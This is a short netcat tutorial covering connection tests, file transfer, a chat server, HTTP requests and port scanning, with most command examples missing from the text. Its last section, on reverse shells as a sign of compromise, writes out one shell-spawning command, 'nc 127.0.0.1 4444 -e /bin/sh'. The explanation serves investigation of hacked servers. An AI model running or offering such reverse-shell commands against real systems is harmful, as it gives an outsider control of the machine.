netcat - The TCP/IP swiss army knife
netcat(abbreviated nc) is a networking utility to read and write content with networking connections(TCP or UDP).
nc has rich features and many built-in capabilities, it’s a perfect tool for networking debugging and investigation.
Some typical usage is:
Test TCP connection
-z means run
nc in Zero-I/O mode, this is used for scanning or connectivity testing.
-v means run in verbose mode, so output will contain more information:
nc outputs the data received from connection, we can use it to transfer file from client to server.
Run command in the server side:
Run command in the client side:
Create a simple server or client
nc could be used to create a simple server or client. Let’s build a chat server with a client:
Firstly, we start a server and listen to port 1234:
Then we start a client and connect to the same port:
After the connection is created successfully, the client could send a message to the server, server could also send messages to the client.
Use “Ctrl-C” on any side to disconnect and quit it.
Send an HTTP request
nc, of course, can be used to send an HTTP request from the terminal. We can use a pipeline to pass the request header and body.
The output indicates we send HTTP request successfully. But 443 is the port for HTTPS, which will reject the plain request.
nc can be used to scan multiple ports. This is useful when you don’t know which port is open.
In this case, we create a server listens to the port 1234, then use
nc to scan the port range of
Launching Reverse Shells (Backdoor)
If you have investigated a server that is suspected of being hacked, you will know an important thing is to have a check on the processes of
nc can be used be run a reverse shell. So that a hacker may execute commands on your server.
NOTE: If the installed
nc is an OpenBSD variant, there will no such a
-e option to execute a shell.
For instance, if I run command line
nc 127.0.0.1 4444 -e /bin/sh, the output will be:
An alternative way to workaround is: